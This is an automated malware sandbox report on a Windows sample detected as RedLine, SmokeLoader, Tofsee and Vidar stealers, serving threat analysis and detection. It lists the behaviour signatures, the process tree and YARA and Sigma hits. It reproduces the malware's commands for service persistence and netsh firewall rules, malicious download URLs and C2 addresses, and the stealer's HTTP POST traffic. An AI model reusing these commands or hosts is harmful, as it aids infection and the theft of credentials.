
Windows Analysis Report nkINykHreE.exe

Overview

General Information

Sample Name: nkINykHreE.exe
Analysis ID: 547895
MD5: dc67c627917ff9724f3c1e6db5f2dc27
SHA1: 4b7528999ad6095b3fbb3aec059efb88d999ea95
SHA256: 26a4c5b36d9fde80ea47137eb53b40dacf240432a5895f98417eae51b6b681da
Tags: exe, RedLineStealer

Detection

RedLine, SmokeLoader, Tofsee, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Sigma detected: Suspect Svchost Activity
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for domain / URL
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Maps a DLL or memory area into another process
Uses netsh to modify the Windows network and firewall settings
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to evade analysis by executing special instructions which cause a usermode exception
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign process
Sigma detected: Suspicious Svchost Process
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Drops executables to the windows directory (C:\Windows) and starts them
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Hides threads from debuggers
Writes to foreign memory regions
.NET source code references suspicious native API functions
Changes security center settings (notifications, updates, antivirus, firewall)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Machine Learning detection for dropped file
Modifies the windows firewall
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Modifies existing windows services
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Checks for debuggers (devices)
Binary contains a suspicious time stamp
Sigma detected: Netsh Port or Application Allowed
Connects to a URL shortener service
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Contains capabilities to detect virtual machines
Contains functionality to detect virtual machines (SLDT)
Uses SMTP (mail sending)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • nkINykHreE.exe (PID: 800 cmdline: "C:\Users\user\Desktop\nkINykHreE.exe" MD5: DC67C627917FF9724F3C1E6DB5F2DC27)
    • nkINykHreE.exe (PID: 3092 cmdline: "C:\Users\user\Desktop\nkINykHreE.exe" MD5: DC67C627917FF9724F3C1E6DB5F2DC27)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • 115B.exe (PID: 340 cmdline: C:\Users\user\AppData\Local\Temp\115B.exe MD5: DC67C627917FF9724F3C1E6DB5F2DC27)
          • 115B.exe (PID: 1412 cmdline: C:\Users\user\AppData\Local\Temp\115B.exe MD5: DC67C627917FF9724F3C1E6DB5F2DC27)
        • 2997.exe (PID: 6936 cmdline: C:\Users\user\AppData\Local\Temp\2997.exe MD5: 1F935BFFF0F8128972BC69625E5B2A6C)
        • 18D.exe (PID: 4992 cmdline: C:\Users\user\AppData\Local\Temp\18D.exe MD5: B7B184D2B0910148CABB9B5E915753D6)
          • cmd.exe (PID: 6552 cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\dbgxuqbr\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 1768 cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\sdiimdop.exe" C:\Windows\SysWOW64\dbgxuqbr\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 2856 cmdline: C:\Windows\System32\sc.exe" create dbgxuqbr binPath= "C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe /d\"C:\Users\user\AppData\Local\Temp\18D.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 3952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 4784 cmdline: C:\Windows\System32\sc.exe" description dbgxuqbr "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 4696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 6404 cmdline: "C:\Windows\System32\sc.exe" start dbgxuqbr MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 6972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • netsh.exe (PID: 7000 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
            • conhost.exe (PID: 2076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • CBA.exe (PID: 5652 cmdline: C:\Users\user\AppData\Local\Temp\CBA.exe MD5: 6C72997AA5DD44A44B27BD36347BAED9)
          • CBA.exe (PID: 7052 cmdline: C:\Users\user\AppData\Local\Temp\CBA.exe MD5: 6C72997AA5DD44A44B27BD36347BAED9)
        • 2757.exe (PID: 2904 cmdline: C:\Users\user\AppData\Local\Temp\2757.exe MD5: 67B848B139E584BF3361A51160FC6731)
        • 4187.exe (PID: 6064 cmdline: C:\Users\user\AppData\Local\Temp\4187.exe MD5: C085684DB882063C21F18D251679B0CC)
        • 13E0.exe (PID: 3952 cmdline: C:\Users\user\AppData\Local\Temp\13E0.exe MD5: AA519DEEB511E886E73F8E0256180800)
        • 1B15.exe (PID: 6380 cmdline: C:\Users\user\AppData\Local\Temp\1B15.exe MD5: D8B78E7D4D822C10CCE3654D7F9E4931)
        • 28C2.exe (PID: 6488 cmdline: C:\Users\user\AppData\Local\Temp\28C2.exe MD5: F111EE7C9F26F50F9EFEEB6EF6C32A3C)
        • 315E.exe (PID: 7032 cmdline: C:\Users\user\AppData\Local\Temp\315E.exe MD5: 4FB3361FFC7E5DD2FAD4413866DB6D2E)
        • 4583.exe (PID: 4784 cmdline: C:\Users\user\AppData\Local\Temp\4583.exe MD5: 11124BB02075AD2D9D750343B42F932A)
  • svchost.exe (PID: 6444 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6644 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6720 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6816 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6868 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6888 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 4176 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 4140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • haifbcd (PID: 2908 cmdline: C:\Users\user\AppData\Roaming\haifbcd MD5: DC67C627917FF9724F3C1E6DB5F2DC27)
    • haifbcd (PID: 4544 cmdline: C:\Users\user\AppData\Roaming\haifbcd MD5: DC67C627917FF9724F3C1E6DB5F2DC27)
  • sdiimdop.exe (PID: 4560 cmdline: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe /d"C:\Users\user\AppData\Local\Temp\18D.exe" MD5: F548B3529CA470C25E50AF6220AD3098)
    • svchost.exe (PID: 5180 cmdline: svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • svchost.exe (PID: 7064 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • scifbcd (PID: 6852 cmdline: C:\Users\user\AppData\Roaming\scifbcd MD5: 1F935BFFF0F8128972BC69625E5B2A6C)

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000000.282842442.0000000003A61000.00000020.00020000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
00000011.00000002.370053936.0000000000751000.00000004.00020000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
00000031.00000002.609571282.0000000003AA7000.00000004.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
0000002F.00000002.595854272.0000000000DF0000.00000040.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000002F.00000002.595854272.0000000000DF0000.00000040.00000001.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
(first 5 of 46 entries shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.nkINykHreE.exe.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
18.2.18D.exe.400000.0.raw.unpack | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security
31.2.sdiimdop.exe.540e50.1.raw.unpack | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security
13.2.haifbcd.4715a0.1.raw.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
34.2.svchost.exe.2bb0000.0.unpack | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security
(first 5 of 24 entries shown)

Sigma Overview

System Summary:

Sigma detected: Suspect Svchost Activity
Source: Process started | Author: David Burkett | Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe /d"C:\Users\user\AppData\Local\Temp\18D.exe", ParentImage: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe, ParentProcessId: 4560, ProcessCommandLine: svchost.exe, ProcessId: 5180
Sigma detected: Copying Sensitive Files with Credential Data
Source: Process started | Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community | Data: Command: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\sdiimdop.exe" C:\Windows\SysWOW64\dbgxuqbr\, CommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\sdiimdop.exe" C:\Windows\SysWOW64\dbgxuqbr\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\18D.exe, ParentImage: C:\Users\user\AppData\Local\Temp\18D.exe, ParentProcessId: 4992, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\sdiimdop.exe" C:\Windows\SysWOW64\dbgxuqbr\, ProcessId: 1768
Sigma detected: Suspicious Svchost Process
Source: Process started | Author: Florian Roth | Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe /d"C:\Users\user\AppData\Local\Temp\18D.exe", ParentImage: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe, ParentProcessId: 4560, ProcessCommandLine: svchost.exe, ProcessId: 5180
Sigma detected: Netsh Port or Application Allowed
Source: Process started | Author: Markus Neis, Sander Wiebing | Data: Command: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine|base64offset|contains: ijY, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\18D.exe, ParentImage: C:\Users\user\AppData\Local\Temp\18D.exe, ParentProcessId: 4992, ProcessCommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, ProcessId: 7000
Sigma detected: New Service Creation
Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: C:\Windows\System32\sc.exe" create dbgxuqbr binPath= "C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe /d\"C:\Users\user\AppData\Local\Temp\18D.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine: C:\Windows\System32\sc.exe" create dbgxuqbr binPath= "C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe /d\"C:\Users\user\AppData\Local\Temp\18D.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\18D.exe, ParentImage: C:\Users\user\AppData\Local\Temp\18D.exe, ParentProcessId: 4992, ProcessCommandLine: C:\Windows\System32\sc.exe" create dbgxuqbr binPath= "C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe /d\"C:\Users\user\AppData\Local\Temp\18D.exe\"" type= own start= auto DisplayName= "wifi support, ProcessId: 2856

Jbx Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://185.7.214.171:8080/6.php | URL Reputation: Label: malware
Source: http://65.108.180.72/msvcp140.dll | Avira URL Cloud: Label: malware
Source: http://91.243.44.130/stlr/maps.exe | Avira URL Cloud: Label: malware
Source: http://65.108.180.72/mozglue.dll | Avira URL Cloud: Label: malware
Source: http://91.219.236.18/capibarl | Avira URL Cloud: Label: phishing
Source: http://privacytools-foryou-777.com/downloads/toolspab2.exe | Avira URL Cloud: Label: malware
Source: http://65.108.180.72/freebl3.dll | Avira URL Cloud: Label: malware
Source: http://data-host-coin-8.com/files/8584_1641133152_551.exe | Avira URL Cloud: Label: malware
Source: http://data-host-coin-8.com/game.exe | Avira URL Cloud: Label: malware
Source: http://data-host-coin-8.com/files/2184_1641247228_8717.exe | Avira URL Cloud: Label: malware
Source: http://91.219.236.18/3 | Avira URL Cloud: Label: phishing
Source: http://194.180.174.53/capibar0 | Avira URL Cloud: Label: phishing
Source: http://unic11m.top/install1.exe | Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: nkINykHreE.exe | Virustotal: Detection: 25%
Source: nkINykHreE.exe | ReversingLabs: Detection: 25%
Multi AV Scanner detection for domain / URL
Source: http://65.108.180.72/msvcp140.dll | Virustotal: Detection: 9%
Source: http://91.243.44.130/stlr/maps.exe | Virustotal: Detection: 8%
Source: http://65.108.180.72/mozglue.dll | Virustotal: Detection: 10%
Machine Learning detection for sample
Source: nkINykHreE.exe | Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\115B.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\scifbcd | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\CBA.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4187.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2997.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\315E.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4BED.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1B15.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\28C2.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4583.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\haifbcd | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\sdiimdop.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2757.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 31.2.sdiimdop.exe.540e50.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 31.3.sdiimdop.exe.570000.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 34.2.svchost.exe.2bb0000.0.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 31.2.sdiimdop.exe.600000.2.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 18.3.18D.exe.560000.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 39.2.2757.exe.1150000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 18.2.18D.exe.400000.0.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 18.2.18D.exe.540e50.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 31.2.sdiimdop.exe.400000.0.unpack | Avira: Label: BDS/Backdoor.Gen

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Unpacked PE file: 18.2.18D.exe.400000.0.unpack
Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe | Unpacked PE file: 31.2.sdiimdop.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\4187.exe | Unpacked PE file: 42.2.4187.exe.400000.0.unpack
Source: nkINykHreE.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\AppData\Local\Temp\2997.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: Binary string: C:\hatisicovapehe\p.pdb | source: 2997.exe, 2997.exe, 00000011.00000002.369808653.0000000000409000.00000020.00020000.sdmp, 2997.exe, 00000011.00000000.353771272.0000000000401000.00000020.00020000.sdmp
Source: Binary string: C:\vuyeguw\zofaxekax.pdb | source: nkINykHreE.exe, nkINykHreE.exe, 00000000.00000000.237076372.0000000000401000.00000020.00020000.sdmp, nkINykHreE.exe, 00000000.00000002.243796103.0000000000401000.00000020.00020000.sdmp, nkINykHreE.exe, 00000001.00000000.241917269.0000000000401000.00000020.00020000.sdmp, haifbcd, 0000000D.00000002.340276141.0000000000401000.00000020.00020000.sdmp, haifbcd, 0000000D.00000000.331309043.0000000000401000.00000020.00020000.sdmp, 115B.exe, 0000000E.00000000.333118920.0000000000401000.00000020.00020000.sdmp, 115B.exe, 0000000E.00000002.341669958.0000000000401000.00000020.00020000.sdmp, haifbcd, 0000000F.00000000.337510866.0000000000401000.00000020.00020000.sdmp, 115B.exe, 00000010.00000000.338143119.0000000000401000.00000020.00020000.sdmp
Source: Binary string: C:\gilos\ye.pdb | source: 18D.exe, 00000012.00000002.391234957.0000000000782000.00000004.00000001.sdmp, 18D.exe, 00000012.00000000.365358490.0000000000401000.00000020.00020000.sdmp, sdiimdop.exe, 0000001F.00000000.391356677.0000000000401000.00000020.00020000.sdmp, svchost.exe, 00000022.00000003.465105222.0000000003258000.00000004.00000001.sdmp
Source: Binary string: i6`C:\vuyeguw\zofaxekax.pdbhQD | source: nkINykHreE.exe, 00000000.00000000.237076372.0000000000401000.00000020.00020000.sdmp, nkINykHreE.exe, 00000000.00000002.243796103.0000000000401000.00000020.00020000.sdmp, nkINykHreE.exe, 00000001.00000000.241917269.0000000000401000.00000020.00020000.sdmp, haifbcd, 0000000D.00000002.340276141.0000000000401000.00000020.00020000.sdmp, haifbcd, 0000000D.00000000.331309043.0000000000401000.00000020.00020000.sdmp, 115B.exe, 0000000E.00000000.333118920.0000000000401000.00000020.00020000.sdmp, 115B.exe, 0000000E.00000002.341669958.0000000000401000.00000020.00020000.sdmp, haifbcd, 0000000F.00000000.337510866.0000000000401000.00000020.00020000.sdmp, 115B.exe, 00000010.00000000.338143119.0000000000401000.00000020.00020000.sdmp
Source: Binary string: kJC:\tozeroc-watege99_zaga\vifalaro.pdb | source: 4187.exe, 0000002A.00000003.446573203.0000000000CB0000.00000004.00000001.sdmp
Source: Binary string: ZC:\gilos\ye.pdbhQD | source: 18D.exe, 00000012.00000002.391234957.0000000000782000.00000004.00000001.sdmp, 18D.exe, 00000012.00000000.365358490.0000000000401000.00000020.00020000.sdmp, sdiimdop.exe, 0000001F.00000000.391356677.0000000000401000.00000020.00020000.sdmp, svchost.exe, 00000022.00000003.465105222.0000000003258000.00000004.00000001.sdmp
Source: Binary string: VC:\hatisicovapehe\p.pdb | source: 2997.exe, 00000011.00000002.369808653.0000000000409000.00000020.00020000.sdmp, 2997.exe, 00000011.00000000.353771272.0000000000401000.00000020.00020000.sdmp
Source: Binary string: C:\tozeroc-watege99_zaga\vifalaro.pdb | source: 4187.exe, 0000002A.00000003.446573203.0000000000CB0000.00000004.00000001.sdmp
Source: C:\Users\user\AppData\Local\Temp\2757.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\Temp\2757.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\2757.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\Temp\2757.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\2757.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\AppData\Local\Temp\2757.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2034813 ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern 192.168.2.5:49897 -> 65.108.180.72:80
                      Source: TrafficSnort IDS: 2034813 ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern 192.168.2.5:49898 -> 116.202.186.120:80
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 194.87.235.183 443
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 40.93.207.1 25
                      Source: C:\Windows\explorer.exeDomain query: bitly.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: patmushta.info
                      Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                      Source: C:\Windows\explorer.exeDomain query: amogohuigotuli.at
                      Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                      Source: C:\Windows\explorer.exeDomain query: f0616068.xsph.ru
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                      Source: C:\Windows\explorer.exeDomain query: privacytools-foryou-777.com
                      Source: C:\Windows\explorer.exeDomain query: unic11m.top
                      Source: C:\Windows\explorer.exeDomain query: vk.com
                      Source: C:\Windows\explorer.exeDomain query: www.mediafire.com
                      Source: C:\Windows\explorer.exeDomain query: natribu.org
                      Source: C:\Windows\explorer.exeDomain query: unicupload.top
                      Source: C:\Windows\explorer.exeDomain query: srtuiyhuali.at
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                      Source: C:\Windows\explorer.exeDomain query: fufuiloirtu.com
                      Source: C:\Windows\explorer.exeDomain query: bit.ly
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: microsoft-com.mail.protection.outlook.com
                      Source: C:\Windows\explorer.exeDomain query: goo.su
                      Source: C:\Windows\explorer.exeDomain query: transfer.sh
                      Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /POeNDXYchB.php HTTP/1.1 | Host: 185.7.214.239 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /sqlite3.dll HTTP/1.1 | Host: 185.7.214.239 | Cache-Control: no-cache | Cookie: PHPSESSID=9tonum6b55n3ncs7ru7lrdrlt3
Source: global traffic | HTTP traffic detected: POST /706 HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A | Content-Length: 25 | Host: 65.108.180.72 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a | Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic | HTTP traffic detected: POST /408 HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A | Content-Length: 25 | Host: 116.202.186.120 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a | Data Ascii: --1BEF0A57BE110FD467A--
